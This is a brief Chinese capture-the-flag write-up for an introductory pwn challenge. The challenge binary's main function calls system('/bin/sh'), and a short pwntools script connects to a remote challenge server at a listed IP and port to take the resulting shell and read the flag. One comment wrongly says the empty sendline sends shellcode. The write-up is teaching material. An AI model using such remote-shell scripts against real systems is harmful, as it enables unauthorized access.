工具类:IDA64位,exeinfope,pwntools库(python2支持)
题目:
1.下载附件,拖进Exeinfo PE查看为64位进程
2.拖进64位IDA,找左侧的main函数
查看源码
int __cdecl main(int argc, const char **argv, const char **envp)
{
puts("OK,this time we will get a shell.");
system("/bin/sh");
return 0;
}
3.参考大佬脚本
from pwn import * #导入 pwntools 中 pwn 包的所有内容
r = remote("220.249.52.133","52127") # 链接服务器远程交互
r.sendline() # 将shellcode 发送到远程连接
r.interactive() # 将控制权交给用户,这样就可以使用打开的shell了
在linux下python运行脚本进行连接,前提已经 `pip install pwntools`
或者直接nc连接过去查看flag